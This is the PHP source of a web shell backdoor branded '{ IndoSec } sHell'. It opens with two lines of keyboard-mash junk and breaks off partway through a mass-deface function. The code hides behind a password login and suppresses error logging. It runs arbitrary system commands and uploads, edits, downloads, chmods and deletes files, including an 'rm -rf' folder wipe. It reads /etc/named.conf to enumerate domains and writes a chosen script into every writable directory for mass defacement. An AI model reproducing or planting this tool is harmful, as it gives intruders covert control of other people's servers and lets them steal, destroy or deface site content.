]][ahhhhhhhasdasdassasdkksdadddsddfgh
במ12[aspddfsdfsdfdfnsd g ggk ffghaskjjsaddddkdasdasd asdadghdgh;';';'
<?php /* * Konsep Shell : Brillyan -Founder { IndoSec }- * Pembuat : Holiq - { IndoSec } * Re-Code Boleh Asal Dah Izin Sama Pembuat, Ganti Author & Re-Code Tanpa Seizin Pembuat... Fix Lo Noob Anjenk * Klo Kga Bisa Bikin Cek Chanel IndoSec, Ada Tutornya, Jangan Cuma Bisa Ganti Author Doank Bangsad * https://www.youtube.com/playlist?list=PLAAbQaUpDeM7nGwS6WfaTm_cPC3RUiswi * Thanks For All Member { IndoSec }, Yang Telah Membantu Proses Pembuatan Shell,Dan Dari Shell Lain Untuk Inspirasinya * { IndoSec sHell } * �2019 { IndoSec } -Holiq- * Contact Me? fb.com/holiq.xid, WhatsApp? Cek Bio Fb * Nb: shell ini blm sepenuhnya selesai, jadi kalau menemukan error/tampilan tidak bagus/tidak responsive harap dimaklumi. V 0.2 */ session_start(); error_reporting(0); @set_time_limit(0); @clearstatcache(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); /* Configurasi */ $aupas = "54062f3bf6377d42b4fab7c8fedfc7da";// IndoSec $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'UTF-8'; date_default_timezone_set("Asia/Jakarta"); function login_shell(){ ?> <!DOCTYPE html> <html> <head> <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/> <meta name="theme-color" content="#343a40"/> <meta name="author" content="Holiq"/> <meta name="copyright" content="{ IndoSec }"/> <title>{ IndoSec sHell }</title> <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/> </head> <body class="bg-dark text-center text-light"> <div class="container text-center mt-3"> <h1>{ INDOSEC }</h1> <h5>sHell Backdoor</h5><hr/> <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Please Login</p> <form method="post"> <div class="form-group 
input-group"> <div class="input-group-prepend"> <div class="input-group-text"><i class="fa fa-user"></i></div> </div> <input type="password" name="pass" placeholder="User Id..." class="form-control"> </div> <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login"> </form> </div> <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a> </body> </html> <?php exit; } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){ if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){ $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }else{ login_shell(); } } /* * Akhir Login * * Aksi Download */ if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')){ @ob_clean(); $file = $_GET['file']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . 
filesize($file)); readfile($file); exit; } function w($dir,$perm){ if(!is_writable($dir)){ return "<font color='red'>".$perm."</font>"; }else{ return "<font color='lime'>".$perm."</font>"; } } function r($dir,$perm){ if(!is_readable($dir)){ return "<font color=red>".$perm."</font>"; }else{ return "<font color=lime>".$perm."</font>"; } } function exe($cmd){ if(function_exists('system')){ @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; }elseif(function_exists('exec')){ @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; }elseif(function_exists('passthru')){ @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; }elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000){ // Socket $info = 's'; }elseif (($perms & 0xA000) == 0xA000){ // Symbolic Link $info = 'l'; }elseif (($perms & 0x8000) == 0x8000){ // Regular $info = '-'; }elseif (($perms & 0x6000) == 0x6000){ // Block special $info = 'b'; }elseif (($perms & 0x4000) == 0x4000){ // Directory $info = 'd'; }elseif (($perms & 0x2000) == 0x2000){ // Character special $info = 'c'; }elseif (($perms & 0x1000) == 0x1000){ // FIFO pipe $info = 'p'; }else{ // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 
'T' : '-')); return $info; } $path = str_replace('\\','/',$path); $paths = explode('/',$path); if(isset($_GET['dir'])){ $dir = $_GET['dir']; chdir($dir); }else{ $dir = getcwd(); } $os = php_uname(); $ip = getHostByName(getHostName()); $ver = phpversion(); $web = $_SERVER['HTTP_HOST']; $sof = $_SERVER['SERVER_SOFTWARE']; $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; $mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; $total = disk_total_space($dir); $free = disk_free_space($dir); $pers = (int) ($free/$total*100); $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>"; $imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>"; $imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>"; function formatSize( $bytes ){ $types = array( 'B', 'KB', 'MB', 'GB', 'TB' ); for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ ); return( round( $bytes, 2 )." 
".$types[$i] ); } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } $d0mains = @file("/etc/named.conf", false); if (!$d0mains){ $dom = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>"; $GLOBALS["need_to_update_header"] = "true"; }else{ $count = 0; foreach ($d0mains as $d0main){ if (@strstr($d0main, "zone")){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } $dom = "$count Domain"; } function swall($swa,$text,$dir){ echo "<script>Swal.fire({ title: '$swa', text: '$text', type: '$swa', }).then((value) => {window.location='?dir=$dir';})</script>"; } function about(){ echo '<div class="card text-center bg-light about"> <h4 class="card-header">{ IndoSec }</h4> <div class="card-body"> <center><div class="img"></div></center> <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p> </div> <div class="card-footer"> <small class="card-text text-muted">Copyright 2019 { IndoSec }</small> </div> </div><br/>'; exit; } function aksiUpload($dir){ echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader"> <div class="card"> <div class="card-body form-group"> <p class="text-muted">//Multiple Upload</p> <div class="custom-file"> <input type="file" name="file[]" multiple class="custom-file-input" id="customFile"> <label class="custom-file-label" for="customFile">Choose file</label> </div> <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload"> </div> </div> </form>'; if(isset($_POST['upload'])){ $jumlah = count($_FILES['file']['name']); for($i=0;$i<$jumlah;$i++){ 
$filename = $_FILES['file']['name'][$i]; $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename); } if($jumlah < 2){ if($up){ $swa = "success"; $text = "Berhasil Upload $filename"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Upload File"; swall($swa,$text,$dir); } }else{ $swa = "success"; $text = "Berhasil Upload $jumlah File"; swall($swa,$text,$dir); } } } function chmodFile($dir,$file,$nfile){ echo "<form method='POST'> <h5>Chmod File : $nfile </h5> <div class='form-group input-group'> <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'> <input type='submit' class='btn btn-danger form-control' value='Chmod'> </div> </form>"; if(isset($_POST['perm'])){ if(@chmod($_GET['file'],$_POST['perm'])){ echo '<font color="lime">Change Permission Berhasil</font><br/>'; }else{ echo '<font color="white">Change Permission Gagal</font><br/>'; } } exit; } function buatFile($dir,$imgfile){ echo "<h4>$imgfile Buat File :</h4> <form method='POST'> <div class='input-group'> <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'> <div class='input-group-prepend'> <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div> </div> </div><br/> <div id='output'></div> <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/> <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'> </form>"; if (isset($_POST['bikin'])){ $name = $_POST['nama_file']; $isi_file = $_POST['isi_file']; foreach ($name as $nama_file){ $handle = @fopen("$nama_file", "w"); if($isi_file){ $buat = @fwrite($handle, $isi_file); }else{ $buat = $handle; } } if ($buat){ $swa = "success"; $text = "Berhasil Membuat File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Membuat File"; swall($swa,$text,$dir); } } } function view($dir,$file,$nfile,$imgfile){ echo '[ <a class="active" 
href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ] <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5> <textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>'; } function editFile($dir,$file,$nfile,$imgfile){ echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; echo "<form method='POST'> <h5>$imgfile Edit File : $nfile</h5> <textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/> <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button> </form>"; if(isset($_POST['edit_file'])){ $updt = fopen("$file", "w"); $hasil = fwrite($updt, $_POST['isi']); if ($hasil){ $swa = "success"; $text = "Berhasil Update File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Update File"; swall($swa,$text,$dir); } } } function renameFile($dir,$file,$nfile,$imgfile){ echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; echo "<form method='POST'> <h5>$imgfile Rename File : $nfile</h5> <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' 
value='$nfile'><br/> <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button> </form>"; if(isset($_POST['rename_file'])){ $lama = $file; $baru = $_POST['namanew']; rename( $baru, $lama); if(file_exists($baru)){ $swa = "success"; $text = "Nama $baru Telah Digunakan"; swall($swa,$text,$dir); }else{ if(rename( $lama, $baru)){ $swa = "success"; $text = "Berhasil Mengganti Nama Menjadi $baru"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Mengganti Nama"; swall($swa,$text,$dir); } } } } function hapusFile($dir,$file,$nfile){ echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; echo "<div class='card card-body text-center text-dark mb-4'> <p>Yakin Menghapus : $nfile</p> <form method='POST'> <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a> <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'> </form> </div>"; if ($_POST['ya']){ if (unlink($file)){ $swa = "success"; $text = "Berhasil Menghapus File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Menghapus File"; swall($swa,$text,$dir); } } } function chmodFolder($dir,$ndir){ echo "<form method='POST'> <h5>Chmod Folder : $ndir </h5> <div class='form-group input-group'> <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['dir'])), -4)."'> <input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'> </div> </form>"; if(isset($_POST['chmo'])){ if(@chmod($_GET['dir'],$_POST['perm'])){ echo '<font color="lime">Change Permission Berhasil</font><br/>'; }else{ echo '<font color="white">Change Permission Gagal</font><br/>'; } } exit; } function buatFolder($dir,$imgfol){ echo "<h5>$imgfol Buat Folder :</h5> <form method='POST'> <div 
class='input-group'> <input type='text' class='form-control' name='nama_folder[]' placeholder='Nama Folder...'> <div class='input-group-prepend'> <div class='input-group-text'><a id='add_input1'><i class='fa fa-plus'></i></a></div> </div> </div><br/> <div id='output1'></div> <input type='submit' class='btn btn-info btn-block' name='buat' value='Buat'> </form>"; if (isset($_POST['buat'])){ $nama = $_POST['nama_folder']; foreach ($nama as $nama_folder){ $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder); $fd = @mkdir ($folder); } if ($fd){ $swa = "success"; $text = "Berhasil Membuat Folder"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Membuat Folder"; swall($swa,$text,$dir); } } } function renameFolder($dir,$ndir,$imgfol){ echo "[ <a href='?dir=".$dir."&aksi=rename_folder' class='active'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ] <h5>$imgfol Rename Folder : $ndir </h5> <form method='POST'> <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' 
value='$nama'><br/> <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/> </form>"; if(isset($_POST['ganti'])){ $baru = htmlspecialchars($_POST['namanew']); $ubah = rename($dir, "".dirname($dir)."/".$baru.""); if($ubah){ $swa = "success"; $text = "Berhasil Mengganti Nama"; $dir = dirname($dir); swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Mengganti Nama"; $dir = dirname($dir); swall($swa,$text,$dir); } } exit; } function deleteFolder($dir,$ndir){ echo "[ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder' class='active'>Delete</a> ] <div class='card card-body text-center text-dark mb-4'> <p>Apakah Yakin Menghapus : $ndir ?</p> <form method='POST'> <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a> <input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'> </form> </div><br/>"; if ($_POST['ya']){ if(is_dir($dir)){ if(is_writable($dir)){ @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $swa = "success"; $text = "Berhasil Menghapus"; $dir = dirname($dir); swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Berhasil Menghapus"; $dir = dirname($dir); swall($swa,$text,$dir); } } } exit; } function aksiMasdef($dir,$file,$imgfol,$imgfile){ function tipe_massal($dir,$namafile,$isi_script){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ file_put_contents($lokasi, $isi_script); }elseif($dirb === '..'){ file_put_contents($lokasi, $isi_script); }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ echo "Done > $lokasi\n"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc,$namafile,$isi_script); } } } } } } function tipe_biasa($dir,$namafile,$isi_script){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ 
file_put_contents($lokasi, $isi_script); }elseif($dirb === '..'){ file_put_contents($lokasi, $isi_script); }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ echo "Done > $dirb/$namafile\n"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']){ echo "[ <a href='?dir=$dir'>Kembali</a> ] <textarea class='form-control' rows='13' disabled=''>"; if($_POST['tipe'] == 'mahal'){ tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); }elseif($_POST['tipe'] == 'murah'){ tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); } echo "</textarea><br/>"; }else{ echo "<form